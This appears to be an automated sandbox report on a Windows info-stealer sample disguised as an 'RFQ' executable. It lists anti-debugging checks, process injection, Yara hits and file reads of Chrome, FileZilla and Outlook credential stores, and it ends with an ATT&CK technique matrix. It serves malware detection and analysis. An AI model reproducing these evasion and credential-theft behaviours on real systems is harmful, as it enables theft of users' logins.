                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B391C0 GetSystemTimeAsFileTime followed by cmp: cmp rdi, 13h and CTI: jc 00007FF7A8B39523h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AA4330 GetCurrentThread,IsDebuggerPresent,GetModuleHandleW,GetProcAddress,_Init_thread_footer,GetCurrentThreadId,RaiseException,
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06482D81 LdrInitializeThunk,
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeMemory allocated: page read and write | page guard
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B13980 SetUnhandledExceptionFilter,K32GetPerformanceInfo,K32GetProcessMemoryInfo,GetProcessHandleCount,
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8A77D60 SetUnhandledExceptionFilter,SetConsoleCtrlHandler,_Init_thread_footer,SetProcessShutdownParameters,GetLastError,
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B9AFA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

Source: RFQ__637456464647.exe, \u000f\u0005/\u000e\u0005.cs Reference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, \u000f\u0005/\u000e\u0005.cs Reference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, \u000f\u0005/\u000e\u0005.cs Reference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
Source: 0.0.RFQ__637456464647.exe.d20000.0.unpack, \u000f\u0005/\u000e\u0005.cs Reference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
Source: 0.2.RFQ__637456464647.exe.d20000.0.unpack, \u000f\u0005/\u000e\u0005.cs Reference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
Source: 1.0.RFQ__637456464647.exe.8f0000.0.unpack, \u000f\u0005/\u000e\u0005.cs Reference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
Source: 1.0.RFQ__637456464647.exe.8f0000.11.unpack, \u000f\u0005/\u000e\u0005.cs Reference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, \ufffdW?\ufffd?/\u061d????.cs Reference to suspicious API methods: ('???Z?', 'MapVirtualKey@user32.dll')
Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, ?\u0040???/\ufffd?\ufffd??.cs Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
Source: 1.0.RFQ__637456464647.exe.8f0000.13.unpack, \u000f\u0005/\u000e\u0005.cs Reference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
Source: 1.0.RFQ__637456464647.exe.8f0000.1.unpack, \u000f\u0005/\u000e\u0005.cs Reference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Memory written: C:\Users\user\Desktop\RFQ__637456464647.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Process created: C:\Users\user\Desktop\RFQ__637456464647.exe C:\Users\user\Desktop\RFQ__637456464647.exe
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Process created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Queries volume information: C:\Users\user\Desktop\RFQ__637456464647.exe VolumeInformation
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Queries volume information: C:\Users\user\Desktop\RFQ__637456464647.exe VolumeInformation
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8AC60E0 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,_Init_thread_footer,CreateNamedPipeW,SetLastError,GetLastError,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8B8819C GetSystemTimeAsFileTime,
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 5_2_00007FF7A8A8B550 GetVersionExW,GetProductInfo,_Init_thread_footer,GetNativeSystemInfo,_Init_thread_footer,

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTR

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  1 Valid Accounts | 2 Command and Scripting Interpreter | 1 Valid Accounts | 1 Valid Accounts | 1 Valid Accounts | 2 OS Credential Dumping | 11 System Time Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Access Token Manipulation | 1 Input Capture | 2 Security Software Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | At (Linux) | Logon Script (Windows) | 112 Process Injection | 1 Virtualization/Sandbox Evasion | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 11 Archive Collected Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Disable or Modify Tools | NTDS | 1 Process Discovery | Distributed Component Object Model | 2 Data from Local System | Scheduled Transfer | 2 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
                  Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 112 Process Injection | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | 11 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | 15 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
